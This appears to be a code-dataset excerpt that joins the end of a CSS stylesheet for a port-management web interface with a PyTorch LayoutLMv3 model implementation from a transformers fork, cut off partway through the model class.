padding: 4px 8px;
border-radius: 4px;
cursor: pointer;
transition: background-color 0.3s;
}
.btn-edit:hover {
background-color: #40a9ff;
}
.add-port-form {
background-color: white;
border-radius: 8px;
box-shadow: 0 2px 8px rgba(0, 0, 0, 0.1);
padding: 20px;
}
.add-port-form h3 {
margin-bottom: 16px;
color: #1890ff;
border-bottom: 1px solid #f0f0f0;
padding-bottom: 10px;
}
/* 模态对话框样式 */
.modal-overlay {
position: fixed;
top: 0;
left: 0;
right: 0;
bottom: 0;
background-color: rgba(0, 0, 0, 0.5);
display: flex;
justify-content: center;
align-items: center;
z-index: 1000;
}
.modal-content {
background-color: white;
border-radius: 8px;
box-shadow: 0 4px 12px rgba(0, 0, 0, 0.15);
padding: 24px;
width: 500px;
max-width: 90%;
}
.modal-content h3 {
margin-bottom: 16px;
color: #1890ff;
border-bottom: 1px solid #f0f0f0;
padding-bottom: 10px;
}
.modal-actions {
display: flex;
justify-content: flex-end;
gap: 10px;
margin-top: 20px;
}
.btn-cancel {
background-color: #f5f5f5;
color: #333;
border: 1px solid #d9d9d9;
padding: 8px 16px;
border-radius: 4px;
cursor: pointer;
transition: all 0.3s;
}
.btn-cancel:hover {
background-color: #e8e8e8;
}
/* 端口详情模态框 */
.port-detail-modal .modal-content {
width: 700px;
}
.port-detail-tabs {
display: flex;
border-bottom: 1px solid #f0f0f0;
margin-bottom: 20px;
}
.port-detail-tab {
padding: 10px 20px;
cursor: pointer;
border-bottom: 2px solid transparent;
transition: all 0.3s;
}
.port-detail-tab.active {
color: #1890ff;
border-bottom-color: #1890ff;
}
.port-detail-panel {
display: none;
}
.port-detail-panel.active {
display: block;
}
.port-info {
margin-bottom: 20px;
}
.port-info-item {
display: flex;
margin-bottom: 10px;
}
.port-info-label {
width: 120px;
font-weight: 500;
color: #666;
}
.port-info-value {
flex: 1;
}
/* 用户管理表格 */
.port-users-table {
width: 100%;
border-collapse: collapse;
margin-bottom: 15px;
}
.port-users-table th, .port-users-table td {
border: 1px solid #f0f0f0;
padding: 10px;
text-align: left;
}
.port-users-table th {
background-color: #fafafa;
}
/* 代理转发设置 */
.proxy-forward-settings {
background-color: #f9f9f9;
border-radius: 6px;
padding: 15px;
margin-top: 15px;
}
.proxy-forward-settings.disabled {
opacity: 0.7;
pointer-events: none;
}
/* 表单提示信息 */
.form-hint {
font-size: 0.8em;
color: #ff6b6b;
margin-top: 5px;
margin-bottom: 0;
}
/* 禁用的表单元素 */
input:disabled {
background-color: #f5f5f5;
cursor: not-allowed;
} |
27182812/ChatGLM-LLaMA-chinese-insturct | 61,217 | src/transformers/models/layoutlmv3/modeling_layoutlmv3.py | # coding=utf-8
# Copyright 2022 Microsoft Research and The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""PyTorch LayoutLMv3 model."""
import collections
import math
from typing import Optional, Tuple, Union
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.utils.checkpoint
from torch.nn import BCEWithLogitsLoss, CrossEntropyLoss, MSELoss
from ...activations import ACT2FN
from ...modeling_outputs import (
BaseModelOutput,
QuestionAnsweringModelOutput,
SequenceClassifierOutput,
TokenClassifierOutput,
)
from ...modeling_utils import PreTrainedModel
from ...pytorch_utils import apply_chunking_to_forward
from ...utils import add_start_docstrings, add_start_docstrings_to_model_forward, logging, replace_return_docstrings
from .configuration_layoutlmv3 import LayoutLMv3Config
logger = logging.get_logger(__name__)
_CONFIG_FOR_DOC = "LayoutLMv3Config"
LAYOUTLMV3_PRETRAINED_MODEL_ARCHIVE_LIST = [
"microsoft/layoutlmv3-base",
"microsoft/layoutlmv3-large",
# See all LayoutLMv3 models at https://huggingface.co/models?filter=layoutlmv3
]
LAYOUTLMV3_START_DOCSTRING = r"""
This model is a PyTorch [torch.nn.Module](https://pytorch.org/docs/stable/nn.html#torch.nn.Module) sub-class. Use
it as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general usage and
behavior.
Parameters:
config ([`LayoutLMv3Config`]): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the [`~PreTrainedModel.from_pretrained`] method to load the model weights.
"""
LAYOUTLMV3_MODEL_INPUTS_DOCSTRING = r"""
Args:
input_ids (`torch.LongTensor` of shape `({0})`):
Indices of input sequence tokens in the vocabulary.
Note that `sequence_length = token_sequence_length + patch_sequence_length + 1` where `1` is for [CLS]
token. See `pixel_values` for `patch_sequence_length`.
Indices can be obtained using [`AutoTokenizer`]. See [`PreTrainedTokenizer.encode`] and
[`PreTrainedTokenizer.__call__`] for details.
[What are input IDs?](../glossary#input-ids)
bbox (`torch.LongTensor` of shape `({0}, 4)`, *optional*):
Bounding boxes of each input sequence tokens. Selected in the range `[0,
config.max_2d_position_embeddings-1]`. Each bounding box should be a normalized version in (x0, y0, x1, y1)
format, where (x0, y0) corresponds to the position of the upper left corner in the bounding box, and (x1,
y1) represents the position of the lower right corner.
Note that `sequence_length = token_sequence_length + patch_sequence_length + 1` where `1` is for [CLS]
token. See `pixel_values` for `patch_sequence_length`.
pixel_values (`torch.FloatTensor` of shape `(batch_size, num_channels, height, width)`):
Batch of document images. Each image is divided into patches of shape `(num_channels, config.patch_size,
config.patch_size)` and the total number of patches (=`patch_sequence_length`) equals to `((height /
config.patch_size) * (width / config.patch_size))`.
attention_mask (`torch.FloatTensor` of shape `({0})`, *optional*):
Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
Note that `sequence_length = token_sequence_length + patch_sequence_length + 1` where `1` is for [CLS]
token. See `pixel_values` for `patch_sequence_length`.
[What are attention masks?](../glossary#attention-mask)
token_type_ids (`torch.LongTensor` of shape `({0})`, *optional*):
Segment token indices to indicate first and second portions of the inputs. Indices are selected in `[0,
1]`:
- 0 corresponds to a *sentence A* token,
- 1 corresponds to a *sentence B* token.
Note that `sequence_length = token_sequence_length + patch_sequence_length + 1` where `1` is for [CLS]
token. See `pixel_values` for `patch_sequence_length`.
[What are token type IDs?](../glossary#token-type-ids)
position_ids (`torch.LongTensor` of shape `({0})`, *optional*):
Indices of positions of each input sequence tokens in the position embeddings. Selected in the range `[0,
config.max_position_embeddings - 1]`.
Note that `sequence_length = token_sequence_length + patch_sequence_length + 1` where `1` is for [CLS]
token. See `pixel_values` for `patch_sequence_length`.
[What are position IDs?](../glossary#position-ids)
head_mask (`torch.FloatTensor` of shape `(num_heads,)` or `(num_layers, num_heads)`, *optional*):
Mask to nullify selected heads of the self-attention modules. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
inputs_embeds (`torch.FloatTensor` of shape `({0}, hidden_size)`, *optional*):
Optionally, instead of passing `input_ids` you can choose to directly pass an embedded representation. This
is useful if you want more control over how to convert *input_ids* indices into associated vectors than the
model's internal embedding lookup matrix.
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned
tensors for more detail.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
more detail.
return_dict (`bool`, *optional*):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple.
"""
LAYOUTLMV3_DOWNSTREAM_INPUTS_DOCSTRING = r"""
Args:
input_ids (`torch.LongTensor` of shape `({0})`):
Indices of input sequence tokens in the vocabulary.
Indices can be obtained using [`AutoTokenizer`]. See [`PreTrainedTokenizer.encode`] and
[`PreTrainedTokenizer.__call__`] for details.
[What are input IDs?](../glossary#input-ids)
bbox (`torch.LongTensor` of shape `({0}, 4)`, *optional*):
Bounding boxes of each input sequence tokens. Selected in the range `[0,
config.max_2d_position_embeddings-1]`. Each bounding box should be a normalized version in (x0, y0, x1, y1)
format, where (x0, y0) corresponds to the position of the upper left corner in the bounding box, and (x1,
y1) represents the position of the lower right corner.
pixel_values (`torch.FloatTensor` of shape `(batch_size, num_channels, height, width)`):
Batch of document images. Each image is divided into patches of shape `(num_channels, config.patch_size,
config.patch_size)` and the total number of patches (=`patch_sequence_length`) equals to `((height /
config.patch_size) * (width / config.patch_size))`.
attention_mask (`torch.FloatTensor` of shape `({0})`, *optional*):
Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
[What are attention masks?](../glossary#attention-mask)
token_type_ids (`torch.LongTensor` of shape `({0})`, *optional*):
Segment token indices to indicate first and second portions of the inputs. Indices are selected in `[0,
1]`:
- 0 corresponds to a *sentence A* token,
- 1 corresponds to a *sentence B* token.
[What are token type IDs?](../glossary#token-type-ids)
position_ids (`torch.LongTensor` of shape `({0})`, *optional*):
Indices of positions of each input sequence tokens in the position embeddings. Selected in the range `[0,
config.max_position_embeddings - 1]`.
[What are position IDs?](../glossary#position-ids)
head_mask (`torch.FloatTensor` of shape `(num_heads,)` or `(num_layers, num_heads)`, *optional*):
Mask to nullify selected heads of the self-attention modules. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
inputs_embeds (`torch.FloatTensor` of shape `({0}, hidden_size)`, *optional*):
Optionally, instead of passing `input_ids` you can choose to directly pass an embedded representation. This
is useful if you want more control over how to convert *input_ids* indices into associated vectors than the
model's internal embedding lookup matrix.
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned
tensors for more detail.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
more detail.
return_dict (`bool`, *optional*):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple.
"""
class LayoutLMv3PatchEmbeddings(nn.Module):
"""LayoutLMv3 image (patch) embeddings. This class also automatically interpolates the position embeddings for varying
image sizes."""
def __init__(self, config):
super().__init__()
image_size = (
config.input_size
if isinstance(config.input_size, collections.abc.Iterable)
else (config.input_size, config.input_size)
)
patch_size = (
config.patch_size
if isinstance(config.patch_size, collections.abc.Iterable)
else (config.patch_size, config.patch_size)
)
self.patch_shape = (image_size[0] // patch_size[0], image_size[1] // patch_size[1])
self.proj = nn.Conv2d(config.num_channels, config.hidden_size, kernel_size=patch_size, stride=patch_size)
def forward(self, pixel_values, position_embedding=None):
embeddings = self.proj(pixel_values)
if position_embedding is not None:
# interpolate the position embedding to the corresponding size
position_embedding = position_embedding.view(1, self.patch_shape[0], self.patch_shape[1], -1)
position_embedding = position_embedding.permute(0, 3, 1, 2)
patch_height, patch_width = embeddings.shape[2], embeddings.shape[3]
position_embedding = F.interpolate(position_embedding, size=(patch_height, patch_width), mode="bicubic")
embeddings = embeddings + position_embedding
embeddings = embeddings.flatten(2).transpose(1, 2)
return embeddings
class LayoutLMv3TextEmbeddings(nn.Module):
"""
LayoutLMv3 text embeddings. Same as `RobertaEmbeddings` but with added spatial (layout) embeddings.
"""
def __init__(self, config):
super().__init__()
self.word_embeddings = nn.Embedding(config.vocab_size, config.hidden_size, padding_idx=config.pad_token_id)
self.token_type_embeddings = nn.Embedding(config.type_vocab_size, config.hidden_size)
self.LayerNorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
# position_ids (1, len position emb) is contiguous in memory and exported when serialized
self.register_buffer("position_ids", torch.arange(config.max_position_embeddings).expand((1, -1)))
self.padding_idx = config.pad_token_id
self.position_embeddings = nn.Embedding(
config.max_position_embeddings, config.hidden_size, padding_idx=self.padding_idx
)
self.x_position_embeddings = nn.Embedding(config.max_2d_position_embeddings, config.coordinate_size)
self.y_position_embeddings = nn.Embedding(config.max_2d_position_embeddings, config.coordinate_size)
self.h_position_embeddings = nn.Embedding(config.max_2d_position_embeddings, config.shape_size)
self.w_position_embeddings = nn.Embedding(config.max_2d_position_embeddings, config.shape_size)
def calculate_spatial_position_embeddings(self, bbox):
try:
left_position_embeddings = self.x_position_embeddings(bbox[:, :, 0])
upper_position_embeddings = self.y_position_embeddings(bbox[:, :, 1])
right_position_embeddings = self.x_position_embeddings(bbox[:, :, 2])
lower_position_embeddings = self.y_position_embeddings(bbox[:, :, 3])
except IndexError as e:
raise IndexError("The `bbox` coordinate values should be within 0-1000 range.") from e
h_position_embeddings = self.h_position_embeddings(torch.clip(bbox[:, :, 3] - bbox[:, :, 1], 0, 1023))
w_position_embeddings = self.w_position_embeddings(torch.clip(bbox[:, :, 2] - bbox[:, :, 0], 0, 1023))
# below is the difference between LayoutLMEmbeddingsV2 (torch.cat) and LayoutLMEmbeddingsV1 (add)
spatial_position_embeddings = torch.cat(
[
left_position_embeddings,
upper_position_embeddings,
right_position_embeddings,
lower_position_embeddings,
h_position_embeddings,
w_position_embeddings,
],
dim=-1,
)
return spatial_position_embeddings
def create_position_ids_from_input_ids(self, input_ids, padding_idx):
"""
Replace non-padding symbols with their position numbers. Position numbers begin at padding_idx+1. Padding
symbols are ignored. This is modified from fairseq's `utils.make_positions`.
"""
# The series of casts and type-conversions here are carefully balanced to both work with ONNX export and XLA.
mask = input_ids.ne(padding_idx).int()
incremental_indices = (torch.cumsum(mask, dim=1).type_as(mask)) * mask
return incremental_indices.long() + padding_idx
def create_position_ids_from_inputs_embeds(self, inputs_embeds):
"""
We are provided embeddings directly. We cannot infer which are padded so just generate sequential position ids.
"""
input_shape = inputs_embeds.size()[:-1]
sequence_length = input_shape[1]
position_ids = torch.arange(
self.padding_idx + 1, sequence_length + self.padding_idx + 1, dtype=torch.long, device=inputs_embeds.device
)
return position_ids.unsqueeze(0).expand(input_shape)
def forward(
self,
input_ids=None,
bbox=None,
token_type_ids=None,
position_ids=None,
inputs_embeds=None,
):
if position_ids is None:
if input_ids is not None:
# Create the position ids from the input token ids. Any padded tokens remain padded.
position_ids = self.create_position_ids_from_input_ids(input_ids, self.padding_idx).to(
input_ids.device
)
else:
position_ids = self.create_position_ids_from_inputs_embeds(inputs_embeds)
if input_ids is not None:
input_shape = input_ids.size()
else:
input_shape = inputs_embeds.size()[:-1]
if token_type_ids is None:
token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=self.position_ids.device)
if inputs_embeds is None:
inputs_embeds = self.word_embeddings(input_ids)
token_type_embeddings = self.token_type_embeddings(token_type_ids)
embeddings = inputs_embeds + token_type_embeddings
position_embeddings = self.position_embeddings(position_ids)
embeddings += position_embeddings
spatial_position_embeddings = self.calculate_spatial_position_embeddings(bbox)
embeddings = embeddings + spatial_position_embeddings
embeddings = self.LayerNorm(embeddings)
embeddings = self.dropout(embeddings)
return embeddings
class LayoutLMv3PreTrainedModel(PreTrainedModel):
"""
An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
models.
"""
config_class = LayoutLMv3Config
base_model_prefix = "layoutlmv3"
def _init_weights(self, module):
"""Initialize the weights"""
if isinstance(module, (nn.Linear, nn.Conv2d)):
# Slightly different from the TF version which uses truncated_normal for initialization
# cf https://github.com/pytorch/pytorch/pull/5617
module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
if module.bias is not None:
module.bias.data.zero_()
elif isinstance(module, nn.Embedding):
module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
if module.padding_idx is not None:
module.weight.data[module.padding_idx].zero_()
elif isinstance(module, nn.LayerNorm):
module.bias.data.zero_()
module.weight.data.fill_(1.0)
class LayoutLMv3SelfAttention(nn.Module):
def __init__(self, config):
super().__init__()
if config.hidden_size % config.num_attention_heads != 0 and not hasattr(config, "embedding_size"):
raise ValueError(
f"The hidden size ({config.hidden_size}) is not a multiple of the number of attention "
f"heads ({config.num_attention_heads})"
)
self.num_attention_heads = config.num_attention_heads
self.attention_head_size = int(config.hidden_size / config.num_attention_heads)
self.all_head_size = self.num_attention_heads * self.attention_head_size
self.query = nn.Linear(config.hidden_size, self.all_head_size)
self.key = nn.Linear(config.hidden_size, self.all_head_size)
self.value = nn.Linear(config.hidden_size, self.all_head_size)
self.dropout = nn.Dropout(config.attention_probs_dropout_prob)
self.has_relative_attention_bias = config.has_relative_attention_bias
self.has_spatial_attention_bias = config.has_spatial_attention_bias
def transpose_for_scores(self, x):
new_x_shape = x.size()[:-1] + (self.num_attention_heads, self.attention_head_size)
x = x.view(*new_x_shape)
return x.permute(0, 2, 1, 3)
def cogview_attention(self, attention_scores, alpha=32):
"""
https://arxiv.org/abs/2105.13290 Section 2.4 Stabilization of training: Precision Bottleneck Relaxation
(PB-Relax). A replacement of the original nn.Softmax(dim=-1)(attention_scores). Seems the new attention_probs
will result in a slower speed and a little bias. Can use torch.allclose(standard_attention_probs,
cogview_attention_probs, atol=1e-08) for comparison. The smaller atol (e.g., 1e-08), the better.
"""
scaled_attention_scores = attention_scores / alpha
max_value = scaled_attention_scores.amax(dim=(-1)).unsqueeze(-1)
new_attention_scores = (scaled_attention_scores - max_value) * alpha
return nn.Softmax(dim=-1)(new_attention_scores)
def forward(
self,
hidden_states,
attention_mask=None,
head_mask=None,
output_attentions=False,
rel_pos=None,
rel_2d_pos=None,
):
mixed_query_layer = self.query(hidden_states)
key_layer = self.transpose_for_scores(self.key(hidden_states))
value_layer = self.transpose_for_scores(self.value(hidden_states))
query_layer = self.transpose_for_scores(mixed_query_layer)
# Take the dot product between "query" and "key" to get the raw attention scores.
# The attention scores QT K/√d could be significantly larger than input elements, and result in overflow.
# Changing the computational order into QT(K/√d) alleviates the problem. (https://arxiv.org/pdf/2105.13290.pdf)
attention_scores = torch.matmul(query_layer / math.sqrt(self.attention_head_size), key_layer.transpose(-1, -2))
if self.has_relative_attention_bias and self.has_spatial_attention_bias:
attention_scores += (rel_pos + rel_2d_pos) / math.sqrt(self.attention_head_size)
elif self.has_relative_attention_bias:
attention_scores += rel_pos / math.sqrt(self.attention_head_size)
if attention_mask is not None:
# Apply the attention mask is (precomputed for all layers in RobertaModel forward() function)
attention_scores = attention_scores + attention_mask
# Normalize the attention scores to probabilities.
# Use the trick of the CogView paper to stablize training
attention_probs = self.cogview_attention(attention_scores)
# This is actually dropping out entire tokens to attend to, which might
# seem a bit unusual, but is taken from the original Transformer paper.
attention_probs = self.dropout(attention_probs)
# Mask heads if we want to
if head_mask is not None:
attention_probs = attention_probs * head_mask
context_layer = torch.matmul(attention_probs, value_layer)
context_layer = context_layer.permute(0, 2, 1, 3).contiguous()
new_context_layer_shape = context_layer.size()[:-2] + (self.all_head_size,)
context_layer = context_layer.view(*new_context_layer_shape)
outputs = (context_layer, attention_probs) if output_attentions else (context_layer,)
return outputs
# Copied from transformers.models.roberta.modeling_roberta.RobertaSelfOutput
class LayoutLMv3SelfOutput(nn.Module):
def __init__(self, config):
super().__init__()
self.dense = nn.Linear(config.hidden_size, config.hidden_size)
self.LayerNorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
def forward(self, hidden_states: torch.Tensor, input_tensor: torch.Tensor) -> torch.Tensor:
hidden_states = self.dense(hidden_states)
hidden_states = self.dropout(hidden_states)
hidden_states = self.LayerNorm(hidden_states + input_tensor)
return hidden_states
# Copied from transformers.models.layoutlmv2.modeling_layoutlmv2.LayoutLMv2Attention with LayoutLMv2->LayoutLMv3
class LayoutLMv3Attention(nn.Module):
def __init__(self, config):
super().__init__()
self.self = LayoutLMv3SelfAttention(config)
self.output = LayoutLMv3SelfOutput(config)
def forward(
self,
hidden_states,
attention_mask=None,
head_mask=None,
output_attentions=False,
rel_pos=None,
rel_2d_pos=None,
):
self_outputs = self.self(
hidden_states,
attention_mask,
head_mask,
output_attentions,
rel_pos=rel_pos,
rel_2d_pos=rel_2d_pos,
)
attention_output = self.output(self_outputs[0], hidden_states)
outputs = (attention_output,) + self_outputs[1:] # add attentions if we output them
return outputs
# Copied from transformers.models.layoutlmv2.modeling_layoutlmv2.LayoutLMv2Layer with LayoutLMv2->LayoutLMv3
class LayoutLMv3Layer(nn.Module):
def __init__(self, config):
super().__init__()
self.chunk_size_feed_forward = config.chunk_size_feed_forward
self.seq_len_dim = 1
self.attention = LayoutLMv3Attention(config)
self.intermediate = LayoutLMv3Intermediate(config)
self.output = LayoutLMv3Output(config)
def forward(
self,
hidden_states,
attention_mask=None,
head_mask=None,
output_attentions=False,
rel_pos=None,
rel_2d_pos=None,
):
self_attention_outputs = self.attention(
hidden_states,
attention_mask,
head_mask,
output_attentions=output_attentions,
rel_pos=rel_pos,
rel_2d_pos=rel_2d_pos,
)
attention_output = self_attention_outputs[0]
outputs = self_attention_outputs[1:] # add self attentions if we output attention weights
layer_output = apply_chunking_to_forward(
self.feed_forward_chunk, self.chunk_size_feed_forward, self.seq_len_dim, attention_output
)
outputs = (layer_output,) + outputs
return outputs
def feed_forward_chunk(self, attention_output):
intermediate_output = self.intermediate(attention_output)
layer_output = self.output(intermediate_output, attention_output)
return layer_output
class LayoutLMv3Encoder(nn.Module):
def __init__(self, config):
super().__init__()
self.config = config
self.layer = nn.ModuleList([LayoutLMv3Layer(config) for _ in range(config.num_hidden_layers)])
self.gradient_checkpointing = False
self.has_relative_attention_bias = config.has_relative_attention_bias
self.has_spatial_attention_bias = config.has_spatial_attention_bias
if self.has_relative_attention_bias:
self.rel_pos_bins = config.rel_pos_bins
self.max_rel_pos = config.max_rel_pos
self.rel_pos_onehot_size = config.rel_pos_bins
self.rel_pos_bias = nn.Linear(self.rel_pos_onehot_size, config.num_attention_heads, bias=False)
if self.has_spatial_attention_bias:
self.max_rel_2d_pos = config.max_rel_2d_pos
self.rel_2d_pos_bins = config.rel_2d_pos_bins
self.rel_2d_pos_onehot_size = config.rel_2d_pos_bins
self.rel_pos_x_bias = nn.Linear(self.rel_2d_pos_onehot_size, config.num_attention_heads, bias=False)
self.rel_pos_y_bias = nn.Linear(self.rel_2d_pos_onehot_size, config.num_attention_heads, bias=False)
def relative_position_bucket(self, relative_position, bidirectional=True, num_buckets=32, max_distance=128):
ret = 0
if bidirectional:
num_buckets //= 2
ret += (relative_position > 0).long() * num_buckets
n = torch.abs(relative_position)
else:
n = torch.max(-relative_position, torch.zeros_like(relative_position))
# now n is in the range [0, inf)
# half of the buckets are for exact increments in positions
max_exact = num_buckets // 2
is_small = n < max_exact
# The other half of the buckets are for logarithmically bigger bins in positions up to max_distance
val_if_large = max_exact + (
torch.log(n.float() / max_exact) / math.log(max_distance / max_exact) * (num_buckets - max_exact)
).to(torch.long)
val_if_large = torch.min(val_if_large, torch.full_like(val_if_large, num_buckets - 1))
ret += torch.where(is_small, n, val_if_large)
return ret
def _cal_1d_pos_emb(self, hidden_states, position_ids):
rel_pos_mat = position_ids.unsqueeze(-2) - position_ids.unsqueeze(-1)
rel_pos = self.relative_position_bucket(
rel_pos_mat,
num_buckets=self.rel_pos_bins,
max_distance=self.max_rel_pos,
)
rel_pos = F.one_hot(rel_pos, num_classes=self.rel_pos_onehot_size).type_as(hidden_states)
rel_pos = self.rel_pos_bias(rel_pos).permute(0, 3, 1, 2)
rel_pos = rel_pos.contiguous()
return rel_pos
def _cal_2d_pos_emb(self, hidden_states, bbox):
position_coord_x = bbox[:, :, 0]
position_coord_y = bbox[:, :, 3]
rel_pos_x_2d_mat = position_coord_x.unsqueeze(-2) - position_coord_x.unsqueeze(-1)
rel_pos_y_2d_mat = position_coord_y.unsqueeze(-2) - position_coord_y.unsqueeze(-1)
rel_pos_x = self.relative_position_bucket(
rel_pos_x_2d_mat,
num_buckets=self.rel_2d_pos_bins,
max_distance=self.max_rel_2d_pos,
)
rel_pos_y = self.relative_position_bucket(
rel_pos_y_2d_mat,
num_buckets=self.rel_2d_pos_bins,
max_distance=self.max_rel_2d_pos,
)
rel_pos_x = F.one_hot(rel_pos_x, num_classes=self.rel_2d_pos_onehot_size).type_as(hidden_states)
rel_pos_y = F.one_hot(rel_pos_y, num_classes=self.rel_2d_pos_onehot_size).type_as(hidden_states)
rel_pos_x = self.rel_pos_x_bias(rel_pos_x).permute(0, 3, 1, 2)
rel_pos_y = self.rel_pos_y_bias(rel_pos_y).permute(0, 3, 1, 2)
rel_pos_x = rel_pos_x.contiguous()
rel_pos_y = rel_pos_y.contiguous()
rel_2d_pos = rel_pos_x + rel_pos_y
return rel_2d_pos
def forward(
self,
hidden_states,
bbox=None,
attention_mask=None,
head_mask=None,
output_attentions=False,
output_hidden_states=False,
return_dict=True,
position_ids=None,
patch_height=None,
patch_width=None,
):
all_hidden_states = () if output_hidden_states else None
all_self_attentions = () if output_attentions else None
rel_pos = self._cal_1d_pos_emb(hidden_states, position_ids) if self.has_relative_attention_bias else None
rel_2d_pos = self._cal_2d_pos_emb(hidden_states, bbox) if self.has_spatial_attention_bias else None
for i, layer_module in enumerate(self.layer):
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
layer_head_mask = head_mask[i] if head_mask is not None else None
if self.gradient_checkpointing and self.training:
def create_custom_forward(module):
def custom_forward(*inputs):
return module(*inputs)
# return module(*inputs, past_key_value, output_attentions, rel_pos, rel_2d_pos)
# The above line will cause error:
# RuntimeError: Trying to backward through the graph a second time
# (or directly access saved tensors after they have already been freed).
return custom_forward
layer_outputs = torch.utils.checkpoint.checkpoint(
create_custom_forward(layer_module),
hidden_states,
attention_mask,
layer_head_mask,
output_attentions,
rel_pos,
rel_2d_pos,
)
else:
layer_outputs = layer_module(
hidden_states,
attention_mask,
layer_head_mask,
output_attentions,
rel_pos=rel_pos,
rel_2d_pos=rel_2d_pos,
)
hidden_states = layer_outputs[0]
if output_attentions:
all_self_attentions = all_self_attentions + (layer_outputs[1],)
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
if not return_dict:
return tuple(
v
for v in [
hidden_states,
all_hidden_states,
all_self_attentions,
]
if v is not None
)
return BaseModelOutput(
last_hidden_state=hidden_states,
hidden_states=all_hidden_states,
attentions=all_self_attentions,
)
# Copied from transformers.models.roberta.modeling_roberta.RobertaIntermediate
class LayoutLMv3Intermediate(nn.Module):
def __init__(self, config):
super().__init__()
self.dense = nn.Linear(config.hidden_size, config.intermediate_size)
if isinstance(config.hidden_act, str):
self.intermediate_act_fn = ACT2FN[config.hidden_act]
else:
self.intermediate_act_fn = config.hidden_act
def forward(self, hidden_states: torch.Tensor) -> torch.Tensor:
hidden_states = self.dense(hidden_states)
hidden_states = self.intermediate_act_fn(hidden_states)
return hidden_states
# Copied from transformers.models.roberta.modeling_roberta.RobertaOutput
class LayoutLMv3Output(nn.Module):
def __init__(self, config):
super().__init__()
self.dense = nn.Linear(config.intermediate_size, config.hidden_size)
self.LayerNorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
def forward(self, hidden_states: torch.Tensor, input_tensor: torch.Tensor) -> torch.Tensor:
hidden_states = self.dense(hidden_states)
hidden_states = self.dropout(hidden_states)
hidden_states = self.LayerNorm(hidden_states + input_tensor)
return hidden_states
@add_start_docstrings(
"The bare LayoutLMv3 Model transformer outputting raw hidden-states without any specific head on top.",
LAYOUTLMV3_START_DOCSTRING,
)
class LayoutLMv3Model(LayoutLMv3PreTrainedModel):
_keys_to_ignore_on_load_missing = [r"position_ids"]
def __init__(self, config):
super().__init__(config)
self.config = config
if config.text_embed:
self.embeddings = LayoutLMv3TextEmbeddings(config)
if config.visual_embed:
# use the default pre-training parameters for fine-tuning (e.g., input_size)
# when the input_size is larger in fine-tuning, we will interpolate the position embeddings in forward
self.patch_embed = LayoutLMv3PatchEmbeddings(config)
size = int(config.input_size / config.patch_size)
self.cls_token = nn.Parameter(torch.zeros(1, 1, config.hidden_size))
self.pos_embed = nn.Parameter(torch.zeros(1, size * size + 1, config.hidden_size))
self.pos_drop = nn.Dropout(p=0.0)
self.LayerNorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
if self.config.has_relative_attention_bias or self.config.has_spatial_attention_bias:
self.init_visual_bbox(image_size=(size, size))
self.norm = nn.LayerNorm(config.hidden_size, eps=1e-6)
self.encoder = LayoutLMv3Encoder(config)
self.init_weights()
def get_input_embeddings(self):
return self.embeddings.word_embeddings
def set_input_embeddings(self, value):
self.embeddings.word_embeddings = value
def _prune_heads(self, heads_to_prune):
"""
Prunes heads of the model. heads_to_prune: dict of {layer_num: list of heads to prune in this layer} See base
class PreTrainedModel
"""
for layer, heads in heads_to_prune.items():
self.encoder.layer[layer].attention.prune_heads(heads)
def init_visual_bbox(self, image_size=(14, 14), max_len=1000):
"""
Create the bounding boxes for the visual (patch) tokens.
"""
visual_bbox_x = torch.div(
torch.arange(0, max_len * (image_size[1] + 1), max_len), image_size[1], rounding_mode="trunc"
)
visual_bbox_y = torch.div(
torch.arange(0, max_len * (image_size[0] + 1), max_len), image_size[0], rounding_mode="trunc"
)
visual_bbox = torch.stack(
[
visual_bbox_x[:-1].repeat(image_size[0], 1),
visual_bbox_y[:-1].repeat(image_size[1], 1).transpose(0, 1),
visual_bbox_x[1:].repeat(image_size[0], 1),
visual_bbox_y[1:].repeat(image_size[1], 1).transpose(0, 1),
],
dim=-1,
).view(-1, 4)
cls_token_box = torch.tensor([[0 + 1, 0 + 1, max_len - 1, max_len - 1]])
self.visual_bbox = torch.cat([cls_token_box, visual_bbox], dim=0)
def calculate_visual_bbox(self, device, dtype, batch_size):
visual_bbox = self.visual_bbox.repeat(batch_size, 1, 1)
visual_bbox = visual_bbox.to(device).type(dtype)
return visual_bbox
def forward_image(self, pixel_values):
